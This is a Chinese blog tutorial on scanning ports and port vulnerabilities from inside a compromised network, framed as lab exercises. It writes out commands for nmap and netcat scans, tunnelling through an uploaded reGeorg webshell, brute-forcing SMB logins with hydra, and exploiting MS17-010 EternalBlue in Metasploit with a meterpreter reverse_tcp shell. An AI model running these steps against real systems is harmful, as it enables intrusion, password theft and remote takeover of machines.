内网拓展——端口扫描及端口漏洞扫描

最新推荐文章于 2024-05-01 13:50:45 发布
最新推荐文章于 2024-05-01 13:50:45 发布
阅读量3.5k 收藏 16
点赞数 1
分类专栏: 后渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxrpty/article/details/105102922
版权

端口扫描

思路:首先查看内网存活的主机,然后查看存活主机的开放端口

方法一:利用nmap工具

nmap.exe -sP 目标网段或指定ip

  

nmap 目标ip

  

方法二:通过代理,用外网的nmap进行扫描

1.上传regeo代理脚本tunnel.aspx到内网的dmz区

  

2.在攻击机上输入以下内容,通过regeorg代理内网的dmz机

python reGeorgSocksProxy.py -u http://192.168.240.50/tunnel.aspx

  

3.修改代理的配置文件

vim /etc/proxychains.conf

  

4.对目标机进行深度扫描

proxychains nmap -sT -Pn -p 80,445,3389 目标ip

  

方法三:s扫描器

1.上传s扫描器

2.查看端口,512是指线程

S.exe TCP 10.1.1.1 10.1.1.1 1-3000 512

  

3.将扫描到的信息打印出来

S.exe TCP 10.1.1.1 10.1.1.1 1-3000 512 /BANNER

  

4.在当前目录下生成一个result文件,存放扫描的结果

S.exe TCP 10.1.1.1 10.1.1.1 1-3000 512 /save

方法四:利用nc

扫描目标地址的ip

nc -nvv -w2 -z 目标ip 1-3000

  

方法五:可通过自写脚本进行扫描

php,python,perl,ruby,java,c等程序都可以用来做端口扫描,同时还可以使用bat或者shell脚本来做扫描

python脚本

#!/usr/bin/env python
 
import socket
 
def get_ip_status(ip,port):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.connect((ip,port))
        print('{0} port {1} is open'.format(ip, port))
    except Exception as err:
        print('{0} port {1} is not open'.format(ip,port))
    finally:
        server.close()
 
if __name__ == '__main__':
    host = '10.0.0.11'
    for port in range(20,100):
        get_ip_status(host,port)

php脚本

$arr = [80,8080,3306];
foreach ($arr as $port) {
    $fp = @fsockopen('172.29.159.198',$port,$errno,$errstr,0.1);
    if (!$fp) {
        echo $port." closed\n";
    }else{
        echo $port." Opend\n";
    }
}

实验一:端口弱口令扫描

实验环境:kali和win3

实验步骤:

利用kali里的九头蛇工具

1.利用nmap查看目标机的端口

  

2.利用九头蛇hydra工具进行爆破

输入:

hydra -L user.txt -P pass.txt 192.168.240.135(目标ip) smb(爆破的服务名)

  

实验二:利用namp脚本

实验环境:kali和win3

实验步骤:

1.查看namp的位置,输入:whereis nmap

2.进入脚本所在位置:

脚本位置:/usr/share/nmap/scripts

  

3.过滤漏洞探测脚本

  

4.选择合适脚本进行攻击

nmap -p 445 --script smb-vuln-ms17-010.nse 目标机ip

  

实验三:端口漏洞扫描

实验环境:kali和win7

实验步骤:

利用kali中的msfconsole工具

1.输入msfconsole进入该工具

2.查看对应漏洞可利用的脚本

search 17_010

3.查看漏洞扫描脚本

use auxiliary/scanner

  

4.利用指定漏洞扫描内网中的机器

use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 目标机ip/32
exploit

  

5.利用合适的exp进行攻击

use exploit/windows/smb/ms17_010_eternalblue
show options
set rhost 目标机ip

  

6.设置payload进行攻击

set payload windows/x64/meterpreter/reverse_tcp
show options
set lhost 攻击机ip
show options
exploit

  

  

  

 

没有如果ru果
关注
  • 1
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网端口扫描工具.zip
07-18
内网端口扫描工具是网络安全领域中不可或缺的实用软件,主要功能是对内部网络中的设备进行端口探测,以便了解哪些服务正在运行、哪个端口是开放的,这对于网络管理和安全维护至关重要。本压缩包文件“内网端口扫描...
扫描内网端口
练习时长两年半的CTF爱好者
01-12 4710
扫描内网端口命令
nmap 扫描内网IP, 系统, 端口
探测???
09-29 1318
内网进行ARP扫描.\nmap.exe -sn 192.168.110.0/24 # 全网段.\nmap.exe -sn 192.168.110.100-200 # 100-200范围。
2024年网安最全内网渗透工具(3)
最新发布
2301_82056337的博客
05-01 612
ssh proxynetcat,socat,hping在很多情况下可以做端口转发和数据代理转发Metasploit的后渗透模块有不少代理模块和端口转发模块mt.exe 国内比较早的一个针对2k和2k3的渗透工具集hd.exe 早起国内某大神修改的mt的升级版,牛逼到爆nmapfscan foundstore 出品的比较早的命令行扫描工具,windows平台内网扫描必备metasploitnc.exe 做小范围端口扫描还是比较合适的。
渗透测试工具 nmap 端口扫描 - 使用详解
weixin_58371339的博客
07-24 7519
指定要使用的TCP标志(flags)进行扫描。TCP标志是TCP协议中用于控制数据传输的一组标记,包括SYN、ACK、RST等。使用--scanflags参数可以帮助网络安全人员发现目标主机上开放的端口和可能存在的漏洞或弱点。nmap --scanflagsS,A <targetIP>:使用SYN和ACK标志进行扫描,即TCP SYN和TCP SYN+ACK扫描。nmap --scanflagsR <targetIP>:使用RST标志进行扫描,即TCP RST扫描。
内网扫描三剑客(netspy+fscan+nmap)
菜鸟学安全的博客
05-14 5104
内网安全漏洞快速扫描工具组合拳,快速发现内网的风险。
内网扫描端口
tianjinsong的专栏
07-17 1235
要扫描指定IP范围内的8006端口,并找到有HTTPS服务且是登录页面的内网IP,我们需要使用curl命令来测试每个IP的8006端口是否提供HTTPS服务,并检查返回的内容是否是登录页面。
内网扫描】fscan v1.8.3 官方版 (内网扫描大杀器)
qq_47493625的博客
01-12 2383
一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
railgun端口识别漏洞扫描工具
01-19
【railgun端口识别漏洞扫描工具】是一种专用于内网探测和扫描的工具,它能够帮助用户检测网络中的开放端口以及潜在的安全漏洞。在网络安全领域,了解网络中哪些服务正在运行并监听哪些端口是至关重要的,这有助于...
[ 内网渗透 ] 内网端口扫描.zip
02-11
端口扫描内网渗透的第一步,它可以帮助安全专家或红队成员发现网络上的开放服务,从而识别潜在的安全漏洞。本文将详细讲解内网端口扫描的相关知识点,以及提供的几个工具的功能和应用场景。 一、内网端口扫描 ...
端口扫描脚本
11-09
端口扫描是网络安全领域中的一个基础操作,常用于检测网络服务的状态、发现潜在漏洞和进行安全审计。在本文中,我们将深入探讨端口扫描的概念、重要性,以及如何使用Python脚本来实现这一功能,特别是在内网渗透过程...
内网8181端口扫描工具
02-15
内网8181端口扫描工具
内网端口扫描+主机发现
qq_45432609的博客
04-21 203
bash命令伪设备端口扫描
一次简单的内网靶场渗透
weixin_46330465的博客
02-19 1398
本套靶场来源于渗透攻击红队。大佬勿喷,请多多指教。
推荐几个端口扫描的脚本
weixin_42603332的博客
02-16 166
为了保护计算机网络的安全,我不会提供任何可能被滥用的工具或脚本。但是,端口扫描是一种常见的网络安全测试技术,可以帮助发现可能存在的安全漏洞,以及确保系统配置符合最佳实践。如果您是网络安全专业人员或系统管理员,并且需要进行端口扫描,请务必确保已获得组织或网络所有者的授权,并且仅使用受信任的工具和脚本。 以下是一些常见的端口扫描工具和脚本: Nmap:这是一款流行的开源端口扫描工具,可以扫描各种TC...
shell ip及端口扫描脚本
songbai220
07-29 1468
看了个kali教程视频,里面涉及一点自写脚本的内容 下面是ip地址扫描,判断主机是否在线的shell #!/bin/bash echo 'inputip:' #提示输入要扫描的ip地址 read inputip #获取终端输入给变量inputip tip=$inputip #将获取到的inputip 给变量 tip 这里是多余的赋值 只是不想修改下面的代码而已 echo -n '1: ' #输出行号 #使用ping方法查看 注意等好后面的是 反单引号 结尾处也是 反单引号 res=
安全人员必备内网漏扫工具——fscan是什么?并Win11安装fscan扫描工具、操作方法
热门推荐
weixin_44716769的博客
11-15 1万+
当Fscan扫描一个IP地址时,它会发送一个ICMP Echo Request消息,如果目标主机响应了这个消息,说明目标主机是存活的。它会向目标主机发送一个TCP连接请求,如果目标主机响应了连接请求,说明该端口是开放的。该命令将扫描xxx.com的TCP端口,并尝试根据响应的TCP包识别运行的服务类型和版本号。该命令将扫描xxx.com的TCP端口,并尝试根据响应的TCP包推断操作系统类型。该命令将扫描xxx.com的所有TCP端口,并列出开放的端口和运行的服务。生成fscan.exe可执行文件。
批量扫描端口shell脚本
m0_59586152的博客
06-15 818
echo -e '\x1dclose\x0d' |timeout --signal=9 2 nmap -sS -Pn -n -T4 -p${jiance_port_one} ${ip} |awk '/report|tcp/{print $0}' |awk 'NR==2{print $2}'
安全编程|信息收集之端口扫描及服务识别脚本编写
s40d1's Blog
03-18 6318
前言 本小弟近期在学习Python安全编程,为了记录自己的学习过程,为了获得那该死的成就感,故得来此文。若文中出现某种知识上错误,以及思维上的偏差,还希望在座各位师傅留言区指正。 基本原理 由于 Web 站点中对外端口提供的服务一般不会变化,可以将端口与服务相对应的数据写入特定的数组中一一对应。通过Python socket 包中的 gethostbyname...
内网ip扫描工具 csdn
07-25
### 回答1: 内网IP扫描工具是一种用于扫描并识别内部网络中各个设备的工具。通常情况下,内网中的设备会被分配一个内部IP地址,以便在同一网络中进行通信。 CSDN(CSDN Internal IP Scanner)是一款功能强大的内网IP扫描工具,主要用于网络管理员或渗透测试人员进行内部网络安全评估和漏洞扫描。CSDN具有以下特点和功能: 1. 网段扫描:CSDN能够通过设置起始和结束的IP地址,扫描指定网络范围内的全部设备。管理员可以自定义扫描的IP范围,包括局域网中的所有主机。 2. 设备识别:CSDN能够探测并识别网络中的各类设备,如计算机、服务器、打印机、路由器等。它能够提供设备的基本信息,如IP地址、MAC地址、设备类型等,以便网络管理员了解网络拓扑结构。 3. 漏洞扫描:CSDN集成了多种漏洞扫描模块,能够自动检测和识别网络中存在的漏洞。它会对设备进行全面的扫描,包括开放端口、漏洞程序、弱口令等,以便管理员及时发现和修复潜在的安全威胁。 4. 安全提醒:CSDN提供实时的报告和告警机制,及时向管理员提供网络中发现的漏洞和安全隐患。管理员可以通过邮件、短信等方式接收到相关的警报,以便及时采取措施避免被攻击。 总而言之,CSDN是一款功能强大的内网IP扫描工具,能够帮助网络管理员或渗透测试人员全面了解内部网络的安全情况,并及时发现和修复潜在的漏洞和威胁。 ### 回答2: 内网IP扫描工具是一种用于扫描和识别内网中的设备的软件工具。它通过发送探测包到指定IP地址范围内的主机,并分析主机的响应来确定目标主机是否可用、开放的端口及其对应的服务等信息。 内网IP扫描工具通常被用于网络管理、安全审计等场景中。它能够帮助管理员发现内网中的未经授权的设备,识别潜在的安全风险,及时采取措施加强网络安全。同时,它也可以用于设备管理,帮助管理员跟踪控制内网设备的信息和状态。 常见的内网IP扫描工具有Nmap、Angry IP Scanner、OpenVAS等。这些工具通常提供了丰富的功能和高度可定制化的选项,使得管理员能够根据自身需求进行扫描操作。比如可以选择扫描目标的IP地址范围,指定探测包的类型和参数,设置扫描的时间间隔等。 然而,需要注意的是,内网IP扫描工具在使用时需遵循法律法规和道德规范,不能违反他人的隐私权和网络安全。因此,在使用这些工具时必须取得合法的授权,并且严格遵守相关的规定和约束。此外,随着网络安全形势的不断变化,内网IP扫描工具的功能和性能也不断更新和改进,因此,使用者需要持续关注新版本和安全补丁,以保持工具的有效性和安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值